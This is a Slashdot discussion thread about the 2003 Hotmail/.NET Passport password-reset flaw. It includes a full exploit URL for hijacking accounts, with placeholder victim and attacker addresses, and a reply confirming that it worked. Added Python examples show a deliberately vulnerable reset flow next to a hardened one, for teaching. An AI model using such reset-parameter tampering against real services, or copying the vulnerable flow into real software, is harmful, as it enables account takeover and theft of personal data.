    16. Re:Can someone explain this? by Theaetetus · · Score: 1
      Too late - look at the logo. They're already the .bORG
      ;)

      -T

    17. Re:Can someone explain this? by jpetts · · Score: 1

      So if I start the .ORG service, can I kill the .NET system?

      Only if you program in ASM

      --
      Call me old fashioned, but I like a dump to be as memorable as it is devastating - Bender
    18. Re:Can someone explain this? by theCoder · · Score: 1

      I don't know a lot about .NET, but from what I've heard, you're describing the CLR. The only thing I don't really get about that idea is that it doesn't seem to bring anything new to the computing table. We already have something that runs applications in different languages. In fact we have several of them. They're called 'x86' and 'ppc' and 'sparc' and 'mips' and so on.

      Also, I think you can compile some other languages like python to run under a JVM. And (in theory) there are JVMs for many different platforms.

      I guess I'm just missing what the point of the .NET CLR is. I know it's not very MS, but it seems it would have been easier to integrate into using a JVM somehow. Though I suppose Sun's idiot lawyers probably would have killed that.

      (I also hope the idiot who went around slapping .NET on the end of every MS product was fired. That alone probably made .NET harder to figure out since everything is .NET and thus it means about as much as a version number to most people)

      --
      "Save the whales, feed the hungry, free the mallocs" -- author unknown
    19. Re:Can someone explain this? by Old+Wolf · · Score: 1

      Well, the court found that MS wasn't allowed to make a JVM because Sun didn't want them to any more. So they made .NET instead.

    20. Re:Can someone explain this? by sjames · · Score: 1

      .NET is a buzzword compliant rewrite of rpc combined with an even more buzzword compliant rehash of java which, itself, is a buzzword compliant rehash of P-code in combination with obsessive-compulsive OOP, nothing more. The various promises it makes are based on a great deal of hand waving which 'just happens' to tie everything to Windows.

  14. Nice going, MS. by Renraku · · Score: 4, Interesting

    Too bad this was caused by a blatant underestimation of the power of curious users. If I had ever used the feature, I would have picked it up instantly.

    --
    Job? I don't have time to get a job! Who will sit around and bitch about being broke and unemployed then?
    1. Re:Nice going, MS. by pod · · Score: 1

      Yup, looks like the reset utility picks up your back-up email address from your Hotmail/Passport profile, sticks it in a URL, redirects you to it, and hopes you don't notice the email address flying by on the address bar. That's a brilliant piece of web app coding right there.

      I sure hope their .net example code snippets followed some sort of secure computing initiative thingy guideline...

      --
      "Hot lesbian witches! It's fucking genius!"
  15. Re:FUD by girl_geek_antinomy · · Score: 3, Insightful

    Instead if you're a legitimate user who's forgotten their password you're now f*cked. *sigh*. Nice to know things have improved then...

  16. Finally... by rf0 · · Score: 2, Funny

    All those l33t hax0rs can now stop asking how to hack hotmail. The answer's right here (if it wasn't 404'd)

    Rus

  17. Yes!! by marcushnk · · Score: 1

    Go the trustworthy computing!

    --
    "Consider how lucky you are that life has been good to you so far. Alternatively, if life hasn't been good to you so far
  18. Well, at least now I know... by johannesg · · Score: 5, Funny
    ...where I don't want to go today.

    Perhaps we can take this opportunity to kill all those spam accounts on hotmail. All we need to do is reset all the passwords to impossible strings...

  19. Really tough fix by alteridem · · Score: 2, Funny

    Sounds like a really tough fix... Delete the offending page... "There, see, its secure."

  20. This should encourage anti-DRM folks by hrbrmstr · · Score: 5, Insightful

    While most geeks take at least some "delight" in vulnerabilities (even outside M$ vulnerabilities), the fact that we keep seeing stupid programmer tricks from M$ employees should be a comforting factor to DRM detractors. Even if M$ manages to get DRM out there, how riddled with holes will it be? If it is constantly circumvented, does anyone think suppliers will use it (DMCA-type laws notwithstanding)?

    And with this being a web-"exploit", it makes the DRM-circumvention idea more interesting since all of the verification will be done online.

    Constant vulnerabilities == no real DRM.

    --
    Mind the gap...
    1. Re:This should encourage anti-DRM folks by Bob9113 · · Score: 4, Insightful

      Even if M$ manages to get DRM out there, how riddled with holes will it be?

      The problem is not whether it works - we all know that DRM is technically impossible (analog hole). The problem is that combined with the DMCA, DRM makes fair use illegal. If Passport were being used for copyright protection, it would be a federal crime to report this security vulnerability.

    2. Re:This should encourage anti-DRM folks by Ender+Ryan · · Score: 1
      Not to mention, DRM will make life a PITA for many people some of the time, and for some people(probably a lot of /.ers) all the time.

      Actually, it's a PITA already. Sometimes I receive "encrypted"(usually by some knucklehead not understanding what he's doing) pdf files that I need to do stuff with... That's just one example. It isn't infrequent that I must violate the DMCA in order to do my job. They're little things, things that noone would think are violations, but by the letter of the law they certainly are.

      <censored>
      ranting and raving about the DMCA, DRM, RIAA, MPAA, dirty politicians, U.S. Congress(oops, that's a dupe), etc.
      </censored>

      --
      Sticking feathers up your butt does not make you a chicken - Tyler Durden
    3. Re:This should encourage anti-DRM folks by hrbrmstr · · Score: 1

      That's a really good point. I keep trying to make a mental note every time something like this comes up - that is, every time one could say "doing XYZ would be violating the DMCA". I overlooked that in this case.

      It'd be a cool if there were a site that did that kind of tracking. An open (moderated) blog whose sole purpose was to document what would be "illegal" as it comes up. It might be an eye-opener to the folks making and signing the laws.

      But, I digress. Back on track, in summation: good post Bob9113.

      --
      Mind the gap...
    4. Re:This should encourage anti-DRM folks by Reziac · · Score: 1

      Not only that, but it can swing the other way and worst case, delete all your legit files -- quite by accident, due to poor programming.

      For anyone who doesn't think so... witness Tripod's draconian "anti-abuse" script: Took us a while to figure out why it was killing some perfectly legit sites, but here it is: When they run it, it deletes any website that has ANY unlinked binary file, even if that's something as simple and innocent as an orphaned GIF. It was designed to get rid of warez repositories, but took the concept a bit too far to say the least.

      --
      ~REZ~ #43301. Who'd fake being me anyway?
    5. Re:This should encourage anti-DRM folks by TheLink · · Score: 1

      The other problem is when the Judge, Court and Jury are all brainwashed to believe it works (Trustworthy Computing and all that BS), and you have to convince them it was broken and it wasn't you that did it.

      --
  21. Re:FUD by markov_chain · · Score: 3, Insightful

    Sure, *this one* is fixed, but it sure doesn't inspire confidence in the security of their service. Who knows if there are other holes left for crackers to exploit...

    --
    Tsunami -- You can't bring a good wave down!
  22. Palladium/NGSCB by leomekenkamp · · Score: 1

    If those guys at Microsoft keep up their abysmal record of 'security', there will be no point whatsoever in Palladium/NGSCB/NewCoolMSName/whatever keeping a computer 'trusted'; when a 'trusted' part of the system has a hole as big as this hotmail flaw, that leaves the whole system wide open.

    Does the XBox BIOS accept URLs of some sort?

    boot://localhost/bootmrg.sys?lc=1033&id=&boot=lilo

    --
    Wenn ist das Nunstueck git und Slotermeyer? Ja! Beiherhund das Oder die Flipperwaldt gersput.
  23. Jokes aside... by ParnBR · · Score: 5, Interesting

    Sooner or later they'll start blaming users for providing personal information, and excusing websites and companies from security flaws.

    --
    My neighbor's .sig is better than mine.
  24. Microsoft .NET Passport Passwords.. :-) by jkrise · · Score: 1, Funny

    Repeat this rapidly ten times, and watch your tongue get locked faster than Windows XP!!

    --
    If you keep throwing chairs, one day you'll break windows....
  25. Whoever has got... by archetypeone · · Score: 5, Funny

    victim@hotmail.com or attacker@attacker.com is going to be really pissed...

    1. Re:Whoever has got... by AVee · · Score: 1
      Don't worry
      # host attacker.com ;; connection timed out; no servers could be reached
    2. Re:Whoever has got... by caluml · · Score: 1

      attacker.com has probably just drowned under a sea of emails....

  26. What do people expect? by Anonymous Coward · · Score: 4, Interesting

    You expect security from a company with one of the worst track records in the industry? Ha!
    The problem with Microsoft (and the majority of other IT firms) is that there is no PROACTIVE auditing. I think that every company should conduct OpenBSD-style code audits before they release software. This would cut down dramatically on the number of incidents like this.

    1. Re:What do people expect? by PerryMason · · Score: 4, Insightful

      The problem with proactive auditing is that it takes time, and as we all know, time is money. Personally I think it's harsh to put the blame on the coders, as I've been involved in alpha and beta testing quite a few apps over the years and almost without exception, the bean counters force the release of a product before the coders are happy with it.

      Typically the bean counters want the cash rolling in as soon as possible on a new product (as they've seen nothing but a cash outflow) and in the software industry, they know that bugs are both inevitable, and unfortunately, for the most part, accepted so they're happy to release an incomplete product knowing that it won't stop people buying it. We won't see substantially bug-free code until software developers are held to the same standards of product reliability that we see in just about every other industry. Until then, there really isn't any reason to thoroughly audit your code. Just release it buggy as all hell and release Service Packs and Hotfixes. It works for the biggest software company on earth, so why shouldn't it for anyone else?

      --
      "I'm tired of all this 'Aren't humanity great' bullshit. We're a virus with shoes" - Bill Hicks
    2. Re:What do people expect? by leomekenkamp · · Score: 1

      The problem with proactive auditing is that it takes time, and as we all know, time is money.

      Such a pity that Microsoft is almost out of cash...

      --
      Wenn ist das Nunstueck git und Slotermeyer? Ja! Beiherhund das Oder die Flipperwaldt gersput.
    3. Re:What do people expect? by conteXXt · · Score: 1

      Audit?

      Why audit when you can CHARGE for fixes?

      Why audit when you will be releasing a new version (at a cost) every 2 years?

      Why audit at all unless your product is free and has a lifecycle longer than its bug list?

      (Why? Ask Theo, he'll tell you)

      --
      The truth about Led Zep should never be told on /. (Karma suicide ensues)
    4. Re:What do people expect? by JimDabell · · Score: 1

      The problem with proactive auditing is that it takes time, and as we all know, time is money.

      15 months ago, Microsoft announced they were spending a whole month on nothing but security - code audits, developer training, you name it. They announced they were focussing much more on security issues.

      This is after they have slowly built up a reputation as being incapable of writing anything securely. If there's one thing Microsoft has had an abundance of, it's time and money.

      Personally I think it's harsh to put the blame on the coders, as I've been involved in alpha and beta testing quite a few apps over the years and almost without exception, the bean counters force the release of a product before the coders are happy with it.

      Yes and no. Things like buffer overflows shouldn't even make it out of the office - it indicates a lack of training and coding standards. Other issues are often the result of bad development process, including, as you mention, premature release.

    5. Re:What do people expect? by wgmari · · Score: 1
      While I don't disagree with you in general, there are some sections of software programming that do not allow software to be released without extensive testing. Would you like the software that's controlling that Boeing 777 you're a passenger on to have a patch announced that fixes a "critical landing bug" while up in the air? I doubt it.

      The problem is that not all software is held up to these standards. And why? As you wrote, time and money. It takes far longer and costs far more to develop software when you have lives depending on the quality of the program. You can't bug-fix someone back to life.

      I am a software developer, and while there are no lives at risk if my code stuffs up, I can tell you that I take it personally if there is a problem in anything that I release. Why should my clients expect anything less?

  27. Flawed concept by YrWrstNtmr · · Score: 2, Insightful

    And eventually, we will see a similar exploit on Sun's Liberty system as well.

    The whole single sign on concept is flawed at present. Far too many potential holes, no matter what the tool, or who the builder.

    1. Re:Flawed concept by Zathrus · · Score: 3, Interesting

      And eventually, we will see a similar exploit on Sun's Liberty system as well.

      While we will undoubtedly see exploits on any system large enough to attract interest, I don't think Sun would code something this brain-dead stupid.

      The industry standard is to ask for a passphrase when you forget your password. MS didn't even do this. I'm still wondering what junior level coder came up with this one though... I can't even express how stupid this is.

      The whole single sign on concept is flawed at present. Far too many potential holes, no matter what the tool, or who the builder.

      So we work to make it better... abandoning the concept entirely isn't going to happen. It's a worthwhile concept IMO, and while there's a lot of issues to be worked out that's not to say that they can't be. Most people would be willing to use a "strong" password if they only had to remember one. When you have to remember a dozen then forget it - the vast majority of people are going to use something like "password" or an easily guessable word from their personal life. Remembering "df783N:pa04uYG" and another dozen variants just isn't going to happen.

    2. Re:Flawed concept by trix_e · · Score: 1

      actually I think this is an example of flawed *reasoning*. Painting all SSO solutions with such a wide brush is misinformed at best, and irresponsible at worst.

      That's like saying that the concept of cars is flawed just because the Yugo existed.

      --
      No man is an island, but Gary is a city in Indiana.
    3. Re:Flawed concept by vadim_t · · Score: 1

      SSO is flawed by design. It's an attempt at getting security without the inconvenience, but this is practically impossible. You either have to re-authenticate continuously, or risk somebody using your account while you go to the bathroom.

      Security is never convenient. It always involves doing something unpleasant, like typing your password every 5 minutes, carrying a card with you all the time to insert in a reader and that you must not forget to take with you to the bathroom, accept being searched, etc.

    4. Re:Flawed concept by Anonymous Coward · · Score: 1, Interesting
      Security is never convenient. It always involves doing something unpleasant, like typing your password every 5 minutes, carrying a card with you all the time to insert in a reader and that you must not forget to take with you to the bathroom, accept being searched, etc.

      Or carrying your thumb or retina around..

    5. Re:Flawed concept by vadim_t · · Score: 1
      Oh, that's inconvenient too. Every security system involves major inconveniences if you lose your token. For example, you have to be really careful with your hands if you use fingerprints. If you lose your card the door won't open, if you cut your finger it's possible that it won't open either, and you can also have an eye infection. Sometimes you may need to have your eye operated, too.

      And anyway, fingerprints are extremely unreliable. It's possible to lift fingerprints from the sensor, and fake a finger with cheap replacements. It will also get dirty fast and of course will start having problems. See this article, for example.

      Retinal scanners probably are more effective, but like all biometric solutions have a BIG problem. If somebody manages to reproduce your fingerprint or retina, what can you do about it? Get a new eye? See? It's all very inconvenient.

    6. Re:Flawed concept by WowTIP · · Score: 1

      I think you underestimate the amount of work biometric companies put down to make their solutions efficient, reliable and secure.

      Many systems that use your fingerprints will allow you to store data from several fingers at once. The chances that you cut both your thumbs and index fingers the same day are pretty slim.

      Another concept getting common is checking bloodflow, heat signature or other biological properties before accepting your finger.

      --

      "I'm surfin the dead zone
      In the twilight, unknown"
    7. Re:Flawed concept by vadim_t · · Score: 1

      Well, I doubt that it's 100% effective. The more complicated something is, the more can go wrong. Heat signature and capacitative sensors can be foiled quite easily, see this article, for example.

      Even if you have a 100% effective scanner that never has a false positive, and can tell a real finger from anything else, you still have a problem: The system doesn't know your finger. It knows the data produced from your finger. Feed it to the system in any other way, and it's going to accept it just fine. It doesn't matter if it's difficult, somebody will figure it out sooner or later. When somebody can impersonate you it will create big problems. You may not be believed because "the system is perfect", or in any case will have to use other fingers, and you don't have an infinite amount of them.

    8. Re:Flawed concept by EvilTwinSkippy · · Score: 1
      The problem with a single sign-on system is not conceptual. Single sign-ons are great for Intranets.

      You can design the system to be virtually crack proof.

      The issue is that you now have the entire user-base of the world trying to live as one big happy family on a central authentication server-farm somewhere. No matter how much you grow that server-farm, you are going to run up against some limitation to performance. If the central server is overwhelmed EVERYTHING attached to it slows to a crawl.

      This is why NT domains are so pathetically small.

      Now to prevent a single point of congestion or failure, you design redundant nodes and/or you start caching information locally.

      Replicating information across databases opens you up to corruption (or pollution) in transit. If you aren't absolutely paranoid about validating both sides of a conversation, haX0rs can insert their own credentials.

      Cached information requires complete trust of the local operating system, all of its binaries, and the network connection between here and the central authenticator. The right magic can insert, spindle, or mutilate credentials in the local cache. (Think stack smashing attacks, spoofing the server, etc.)

      --
      "Learning is not compulsory... neither is survival."
      --Dr.W.Edwards Deming
  28. Re:FUD by Anonymous Coward · · Score: 3, Insightful

    Fixed? They disabled resetting of passwords... that is a quick hack to stop the bleeding, but it does not get around the real issue of poor design. Is it that hard to actually think about what kind of input can come in a query string, and what should be done with it? Aren't they supposed to be professionals? I learned about this in a CS course, and I couldn't help thinking, "duh, any sensible person wouldn't be that stupid..." Obviously I was wrong.
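
The password-reset flow pod describes earlier in the thread (the reset page copies the backup address out of the profile into a URL, and the next step trusts whatever address arrives in that URL) and the query-string point made in the post above, as an added example that is not code from the original page, from Microsoft Passport, or from any poster. The handler names, the parameter names (account, sendto, token) and the sample profile are assumptions made up for illustration; the real Passport parameters are not reproduced here.

```python
# Added example; not code from Microsoft Passport or from any poster.
# Parameter names (account, sendto, token) and the profile store are
# hypothetical, chosen only to illustrate the flaw and one sound fix.
import hashlib
import secrets
import time
from urllib.parse import parse_qs, urlencode

# Constructed sample profile store: account -> backup address and password.
PROFILES = {
    "victim@hotmail.com": {
        "backup_email": "victim-backup@example.net",
        "password": "old-secret",   # a real system stores a password hash
    },
}

# --- Flawed flow, as described in the thread -------------------------------
# Step 1 reads the backup address from the profile and puts it in the URL
# of step 2.  Step 2 then trusts whatever address arrives in the query
# string, so an attacker skips step 1 and calls step 2 with their own.

def flawed_step1(account):
    """Returns the redirect URL the server sends the browser to, or None."""
    profile = PROFILES.get(account)
    if profile is None:
        return None
    return "/reset/step2?" + urlencode(
        {"account": account, "sendto": profile["backup_email"]})

def flawed_step2(query_string):
    """Returns the address the reset link is mailed to: the client's choice."""
    q = parse_qs(query_string)
    account = q.get("account", [""])[0]
    sendto = q.get("sendto", [""])[0]
    if account not in PROFILES:
        return None
    return sendto   # nothing ties `sendto` back to the stored profile

# --- Hardened flow ----------------------------------------------------------
# The destination comes only from server-side state, and the reset itself
# needs a random, single-use, expiring token that was mailed there.

TOKEN_TTL = 15 * 60
_TOKENS = {}   # sha256(token) -> (account, expiry); only the hash is stored

def request_reset(query_string, now=None):
    """Returns {"to": stored backup address, "token": token}, or None."""
    now = time.time() if now is None else now
    q = parse_qs(query_string)
    account = q.get("account", [""])[0]
    profile = PROFILES.get(account)
    if profile is None:
        return None   # a real app answers identically either way (no enumeration)
    token = secrets.token_urlsafe(32)
    key = hashlib.sha256(token.encode()).hexdigest()
    _TOKENS[key] = (account, now + TOKEN_TTL)
    # Any `sendto` in the query string is ignored; the address is looked up.
    return {"to": profile["backup_email"], "token": token}

def complete_reset(token, new_password, now=None):
    """Consumes the token; True only if the password was actually changed."""
    now = time.time() if now is None else now
    entry = _TOKENS.pop(hashlib.sha256(token.encode()).hexdigest(), None)
    if entry is None:
        return False   # unknown token, or already used
    account, expires = entry
    if now > expires:
        return False   # expired; the pop above already discarded it
    PROFILES[account]["password"] = new_password
    return True
```

The fix the thread reports (taking the reset page offline) stops the bleeding but leaves legitimate users unable to recover their accounts; the hardened flow above keeps the feature and removes the client's ability to choose where the reset goes, and adds the token step that a reset flow needs anyway so that knowing someone's backup address is not by itself enough to take over the account.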

  29. Re:FUD by CowboyBob500 · · Score: 5, Insightful

    Fixed does not mean simply 404ing the offending page. There are many legitimate users now who cannot change their passwords. This is a cheap hack while they work out what the fsck to do about the real problem.

    Bob

  30. Try stealing billgates@hotmail.com by jkrise · · Score: 2, Funny

    You could freak out with all his credit cards! Assuming he's got a good credit rating though :-(

    --
    If you keep throwing chairs, one day you'll break windows....
    1. Re:Try stealing billgates@hotmail.com by miscGeek · · Score: 1, Funny

      Even Billy Boy knows better than to trust M$ with his credit card information :)

      --
      May the source be with you!
    2. Re:Try stealing billgates@hotmail.com by rf0 · · Score: 3, Funny

      or just go for abuse@hotmail.com.

      Rus

    3. Re:Try stealing billgates@hotmail.com by Anonymous Coward · · Score: 3, Funny

      That reminds me of the time I and a friend noticed a free mail provider that had forgotten to reserve certain interesting (to say the least) addresses.

      I got webmaster@... and I believe my friend got administrator@...

      I don't know if my friend got any mail, but I got a lot of interesting messages until I got bored and stopped checking it :-)

      Now, before any of you start bashing me for being irresponsible, I did try to help out the users who sent me mail. Mostly I just told them who to really contact.

      I did get carried away a couple of times though. Once I decided to reply to a spam complaint and thanked them for the nice porn links they forwarded to me. They never responded, funny thing.

      (this posted anonymously for obvious reasons)

    4. Re:Try stealing billgates@hotmail.com by TheLink · · Score: 1

      Heck I got postmaster from an ISP once. Not like I'd check it - but I can use it for usenet posts :).

      After a few days, someone from the ISP called up and asked if I could please change it to something else.

      I suggested root. But for some reason they didn't like that one either nor the other few I suggested.

      Oh well, I've recently registered buy and contact at the same ISP's new brand domain name ;).

      --
    5. Re:Try stealing billgates@hotmail.com by karlm · · Score: 1

      abuse@hotmail.com has not been checked in several months and so the account has been deactivated.

      --
      Copyright Violation:"theft, piracy"::Anti-Trust Violation:"thermonuclear price terrorism"<-Overly dramatic language.
    6. Re:Try stealing billgates@hotmail.com by nyseal · · Score: 1

      Wow...I'm curious to know if Billy even USES a hotmail account.....how ironic if he doesn't!

      --
      [SIG] Remember Mattel handheld games?
    7. Re:Try stealing billgates@hotmail.com by epsalon · · Score: 1

      On our university system, student accounts must start with an 's', and cannot start with 'sys'. One student took "sisadmin" and another took "samba"...

  31. How do you contact Microsoft? by Albanach · · Score: 5, Interesting
    This raises an interesting question about how, exactly, you are supposed to notify Microsoft by email.

    Microsoft make an interesting interpretation of RFCs by accepting all mail to postmaster@ but only insofar as to send an automatic response saying your message will not be read.

    This guy also says he tried to email them ten times and never got further than automagic autoreplies. Do they actually have a procedure to inform them when things are broken?

    1. Re:How do you contact Microsoft? by Anonymous Coward · · Score: 2, Informative

      Yes, it's called posting on slashdot, silly!

    2. Re:How do you contact Microsoft? by PerryMason · · Score: 4, Funny

      Do they actually have a procedure to inform them when things are broken?

      As far as i'm aware, they have a guy who just keeps clicking reload on the /. front page waiting for a new MS vulnerability story to pop up. They tried the same thing with Bugtraq but there were just way too many vulnerabilities for the poor guy to keep up.

      --
      "I'm tired of all this 'Aren't humanity great' bullshit. We're a virus with shoes" - Bill Hicks
    3. Re:How do you contact Microsoft? by Quixote · · Score: 2, Informative
      I don't know about you guys, but I just got this from my buddy Steve Ballmer today:

      From SteveBallmer@ceo.microsoft.com Thu May 08 01:26:33 2003
      Return-Path: <SteveBallmer@ceo.microsoft.com>
      Delivered-To: unknown@somewhere.com
      Received: (qmail 8935 invoked from network); 8 May 2003 01:26:32 -0000
      Received: from unknown (HELO delivery.pens.microsoft.com) (207.46.248.68)
      by xxxxxxxxxxxx with SMTP; 8 May 2003 01:26:12 -0000
      Received: from TK2MSFTDDSQ04 ([10.40.1.68]) by delivery.pens.microsoft.com with
      Microsoft SMTPSVC(5.0.2195.5600);
      Wed, 7 May 2003 18:21:11 -0700
      Reply-To: "Steve Ballmer" <GUID-DELETED-@ceo.microsoft.com>
      From: "Steve Ballmer" <SteveBallmer@ceo.microsoft.com>
      To: <unknown@somewhere.com>
      Subject: Rights Management: Enabling New Opportunities for Customers
      Date: Wed, 7 May 2003 18:24:10 -0700
      Message-ID: <37337373373733737337xxxx@phx.gbl>
      MIME-Version: 1.0
      Content-Type: text/plain;
      charset="iso-8859-1"
      Content-Transfer-Encoding: quoted-printable
      X-Mailer: Microsoft CDO for Windows 2000
      Content-Class: urn:content-classes:message
      X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
      Return-Path: SteveBallmer@ceo.microsoft.com
      X-OriginalArrivalTime: 08 May 2003 01:20:07.0109 (UTC)
      FILETIME=[DEADBEEF:3MTA3]
      Status: RO
      Content-Length: 11377
      Lines: 206

      May 7, 2003

      I'm writing to you today about a set of emerging technologies that hold great
      promise for enhancing privacy and enabling important new uses for computers and other digital devices. Before I share my thoughts about this in more detail, I want to explain why you're receiving this email.

      So, in case you guys need to contact Steve, you have his email address now!

    4. Re:How do you contact Microsoft? by dki · · Score: 1

      Actually, there is a procedure for notifying Microsoft, at least regarding security, via a form on their website.

      While the form seems more software-oriented, I imagine one could complain about Passport there as well. I once used it to report what I perceived as a security flaw in XP's built-in firewall, and they were very prompt in their response (they didn't share my perception).

  32. Re:FUD by edyavno · · Score: 1

    How's turning off the ability to recover your password "fixing" it? It's not a fix, but disabling a feature that's essential for users who've forgotten their passwords. It's only temporary of course: it stops people from using the exploit while MS is working on really fixing it.

  33. Re:FUD by Anonymous Coward · · Score: 1, Interesting

    And what if Microsoft had not been kindly warned of the exploit by the person who found it?

  34. Comment removed by account_deleted · · Score: 1

    Comment removed based on user account deletion

  35. The Damage Has Been Done by TubeSteak · · Score: 5, Insightful
    "Passport accounts are central repositories for a person's online data and can include personal information such as birthdays and credit card numbers as well as acting as the single key for the customer's online accounts."

    It's kind of important to remember that this exploit has been out in the wild for a loooooong time. I can imagine Danka is going to have a lot of pissed off h4x0rs who are going to want their exploit back.

    ~would this be the prime example of a security hole being called a feature?~

    --
    [Fuck Beta]
    o0t!
    1. Re:The Damage Has Been Done by Anonymous+Struct · · Score: 2, Interesting

      Not to mention the real damage -- solid evidence that no matter how many assurances Microsoft gives you that your data is safe and they've taken all precautions, you simply cannot trust them with important personal data. How many times does your bank have to 'whoops' a $1500 deposit before you decide that it's just not acceptable to do business with them? Once is usually enough.

      Having your website defaced is one thing, and having a day-long network headache because of the most recent worm is one thing, but losing sensitive personal data is quite another. Based on their track record, Microsoft is simply not qualified to step into the role of holding and protecting important personal information, and this exploit makes that abundantly clear.

      To be fair, maybe nobody is qualified to step into that role right now, but Microsoft's release-now fix-later approach to software development has no place in an environment where there's so much at stake.

  36. What's really scary... by Anonymous Coward · · Score: 1, Informative

    ... about this is how Microsoft continues to soapbox about how secure M$ products are yet repeatedly ignores those who find holes. This guy sent them several emails about this and they did nothing until they were called out on it. The same thing happened with BO and CdC. They informed M$ of security issues related to "Back Office" and then created Back Orifice as a "See, I told you so", when M$ refused to acknowledge the problem...

  37. Re: Procedure to inform them it's broken. by zakezuke · · Score: 5, Interesting

    There is an outlined procedure for this sorta thing...

    In the event a user discovers an exploit, inform user to reboot machine and it will go away.

    But seriously, there seems to be no OFFICIAL way for end users to actually contact Microsoft, nor any sorta automated system to rank e-mails based on importance, nor any human within the phone network who actually knows who to talk to. People I've known that worked there also have no clue as far as who to talk to, and admit this if you're lucky. If you are unlucky, they just say it's a vendor issue without thinking that the vendor is Microsoft.

    --
    There is no sanctuary. There is no sanctuary. SHUT UP! There is no shut up. There is no shut up.
  38. thoughts by unborracho · · Score: 2, Interesting

    Since the report wasn't very descriptive, I was hoping someone could enlighten me. I would assume that since they don't ask you to provide your old password to change it, this is a method for users who forgot their old password to get it reset to some random password that Microsoft gave, and have it sent to an email that the user provided from the website.

    So couldn't Microsoft simply fix this by having the email sent to the person's email address they provided when they registered with .NET? (assuming it's non-hotmail)

    --
    "You had this look that of an angel, it was such a bad disguise" --Dishwalla
    1. Re:thoughts by Kredal · · Score: 5, Informative

      Since it's been 404'd, I'll provide it here.

      If you went to:

      https://register.passport.net/emailpwdreset.srf?lc=1033&em=victim@hotmail.com&id=&cb=&prefem=attacker@attacker.com&rst=1

      and replaced the victim address with a real user's, and attacker@attacker.com with your address, they would send you an email telling you to click on another link, and you could set your own password. Voilà, you now have rights to that Hotmail account so you can read their mail, look at their buddy list, safely spam people, buy stuff (if they have their credit card saved), etc etc etc... Real fun stuff.

      --
      Whoever stated that signature sizes should be limited to one hundred and twenty characters can just go ahead and kiss my
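The reset flow as the two comments above describe it (a reset link mailed to whatever address the request names, with the link alone enough to set a new password), beside the fix the "thoughts" comment suggests (mail only the address on file). This is an added example, not Passport's or Microsoft's code and not posted by anyone in the thread; the in-memory user store, the stand-in mail transport and all names are assumptions. The hardened version also makes the token random, stores only its hash, and makes it single-use and short-lived, which goes a little beyond what the comments ask for.

```python
"""Password-reset flow: the flawed design described in the comments above,
beside a hardened version.  Added example; it is not Passport's or Microsoft's
code.  The user store, the mail transport and every name here are assumptions."""
import hashlib
import secrets
import time


def hash_password(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)


class UserStore:
    """Constructed in-memory user table: email -> [salt, password hash]."""
    def __init__(self, accounts):
        self._rows = {}
        for email, pw in accounts.items():
            self.set_password(email, pw)

    def exists(self, email):
        return email in self._rows

    def check(self, email, password):
        row = self._rows.get(email)
        return row is not None and secrets.compare_digest(hash_password(password, row[0]), row[1])

    def set_password(self, email, password):
        salt = secrets.token_bytes(16)
        self._rows[email] = [salt, hash_password(password, salt)]


class Outbox:
    """Stand-in mail transport: recipient address -> list of message bodies."""
    def __init__(self):
        self.mail = {}

    def send(self, to, body):
        self.mail.setdefault(to, []).append(body)


class VulnerableReset:
    """The flaw as the comments describe it: the caller names the mailbox that
    receives the reset link ('prefem'), so a victim's link can be sent anywhere."""
    def __init__(self, users, outbox):
        self.users, self.outbox, self.pending = users, outbox, {}

    def request_reset(self, em, prefem):
        if self.users.exists(em):
            token = secrets.token_urlsafe(16)
            self.pending[token] = em                      # the link alone grants a reset
            self.outbox.send(prefem, "reset?token=" + token)

    def complete_reset(self, token, new_password):
        email = self.pending.pop(token, None)
        if email is None:
            return False
        self.users.set_password(email, new_password)
        return True


class HardenedReset:
    """The link goes only to the address on file; the caller cannot choose it.
    Tokens are random, stored only as a hash, single-use and short-lived."""
    TTL_SECONDS = 15 * 60

    def __init__(self, users, outbox, now=time.time):
        self.users, self.outbox, self.now, self.pending = users, outbox, now, {}

    def request_reset(self, em):
        if self.users.exists(em):
            token = secrets.token_urlsafe(32)
            key = hashlib.sha256(token.encode()).hexdigest()
            self.pending[key] = (em, self.now() + self.TTL_SECONDS)
            self.outbox.send(em, "reset?token=" + token)  # on-file address only
        # Same answer either way, so the form cannot reveal which addresses exist.
        return "If that account exists, a reset link has been mailed to it."

    def complete_reset(self, token, new_password):
        key = hashlib.sha256(token.encode()).hexdigest()
        entry = self.pending.pop(key, None)               # single use
        if entry is None or self.now() > entry[1]:        # unknown or expired
            return False
        self.users.set_password(entry[0], new_password)
        return True


def demo():
    """Plays the pattern from the comments against both designs; returns the outcomes."""
    victim, attacker = "victim@example.com", "attacker@example.net"   # constructed
    results = {}

    users, outbox = UserStore({victim: "correct horse"}), Outbox()
    weak = VulnerableReset(users, outbox)
    weak.request_reset(em=victim, prefem=attacker)
    link = outbox.mail[attacker][0]                       # victim's link, attacker's mailbox
    weak.complete_reset(link.split("token=")[1], "pwned")
    results["vulnerable_takeover"] = users.check(victim, "pwned")

    users, outbox = UserStore({victim: "correct horse"}), Outbox()
    strong = HardenedReset(users, outbox)
    strong.request_reset(em=victim)                       # no parameter names another mailbox
    results["hardened_link_leaked"] = attacker in outbox.mail
    token = outbox.mail[victim][0].split("token=")[1]
    results["hardened_first_use"] = strong.complete_reset(token, "new pass")
    results["hardened_replay"] = strong.complete_reset(token, "again")
    results["owner_password_set"] = users.check(victim, "new pass")
    return results
```

`demo()` shows the difference directly: against `VulnerableReset` the attacker's mailbox receives the victim's link and the takeover succeeds, while `HardenedReset` has no parameter through which a second mailbox can be named, so only the owner can complete the reset, and only once.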
    2. Re:thoughts by planckscale · · Score: 1
      It works. I got the email and was sent to a page where I could reset my password without having to type in my old password first.

      --
      Namaste
  39. 404 by Richard_J_M · · Score: 2, Informative

    The vulnerability seems to return a 404 - so it seems hotmail have taken notice after all - even though it took a /. to make them notice.

  40. Add one to the pile by Ashyukun · · Score: 5, Funny

    Yet another reason to be glad I ditched my Hotmail account and refuse to use Passport after Hotmail 'politely' informed me that my last name (the one I was born with) violated their offensive language filter and asked me to change my last name.

    1. Re:Add one to the pile by FauxPasIII · · Score: 3, Funny

      I think I speak for everyone here when I ask... What's your last name ?!

      --
      25% Funny, 25% Insightful, 25% Informative, 25% Troll
    2. Re:Add one to the pile by csteinle · · Score: 1

      What, as in "Allcock, All the Time?"

    3. Re:Add one to the pile by the+bluebrain · · Score: 1

      Considering both the prez and the vice prez might have the same problem (okay ... first names, too), you're in ... uh ... elite company (I hesitate to use the word "good" univocally)

      --
      yes, we have no bananas
    4. Re:Add one to the pile by dubstop · · Score: 5, Funny

